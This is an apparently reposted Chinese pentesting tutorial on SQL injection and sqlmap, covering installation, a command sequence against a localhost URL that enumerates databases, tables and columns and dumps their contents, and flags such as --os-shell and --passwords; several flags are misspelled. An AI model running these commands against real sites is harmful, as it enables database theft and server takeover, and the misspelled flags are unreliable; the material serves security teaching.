欢迎来到尧图网

客户服务 关于我们

您的位置:首页 > 健康 > 养生 > 渗透利器-kali工具 (第三章-4) sqlmap之sql注入原理利用

渗透利器-kali工具 (第三章-4) sqlmap之sql注入原理利用

2025/2/8 20:34:05 来源:https://blog.csdn.net/ztc131450/article/details/143633078  浏览:    关键词:渗透利器-kali工具 (第三章-4) sqlmap之sql注入原理利用

从sql注入到sqlmap的使用

一:认识sql注入漏洞

  1.什么是sql注入:

    攻击者通过构造不同的sql语句来实现对数据库的操作。

  2.两个关键条件:

    1.参数用户可以控制。

    2.程序原本要执行的代码,拼接了用户输入的数据,然后去执行。

二:sqlmap简介

  1.开源的渗透测试工具、自动化检测和利用sql注入漏洞。

  2.支持对多种数据库进行注入测试。

  3.支持多种注入技术,例如:盲注、时间延时注入、报错注入等。

  4.支持枚举用户数据库信息,列入,用户名、密码。

  5.自动识别哈希密码,并且使用密码字典进行破解。

  sqlmap是渗透测试人员对测试SQL注入漏洞进行检测的最佳工具。

三:sqlmap在Windows下的安装配置

  1.sqlmap工具地址:https://github.com/sqlmapproject/sqlmap

  2.安装配置:https://www.python.org/downloads/windows/

  3.python2和python3共存:https://www.zkaq.org/t/3572.html

  sqlmap最新版本支持Python2.7和python3,安装好Python就可以直接使用 。

四:sqlmap的常见用法、命令用法

  1.sqlmap注入的基本流程:

    判断sql注入点

    查询数据库信息

    根据数据库查询数据包

    根据数据表查询列信息

    通过sql注入点来让我们进一步信息收集

  2.sqlmap测试流程:

    1.检测是否存在注入点:

      sqlmap.py –u http://127.0.0.1/index.php?id=1 

    2.查询数据库信息:

      sqlmap.py –u http://127.0.0.1/index.php?id=1 --dbs

    3.通过数据库查询数据表信息:

      sqlmap.py –u http://127.0.0.1/index.php?id=1 -D 库名 --tables

    4.通过数据表查询字段信息:

      sqlmap.py –u http://127.0.0.1/index.php?id=1 -D 库名 -T 表名 --cloumns

    5.通过字段枚举字段内容:

      sqlmap.py –u http://127.0.0.1/index.php?id=1 --dump -D 库名 -T 表名 -C 字段名[可以多个]

  3.查看数据库相关信息:

    --current -user    枚举当前用户

    --cruuent -dbs    枚举当前数据库

    --dbs        枚举可用的数据库

    --is -dbs       枚举数据库权限

    --os-shell       向网站中投入cmdshell

    --passwords     枚举数据库用户密码

    -f          启用广泛的指纹识别

    -b            检测数据库指纹

    --hostname       枚举主机名称

    --identity-waf     检测waf信息

  4.sqlmap更新:[建议直接下载]:

    sqlmap.py --update

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com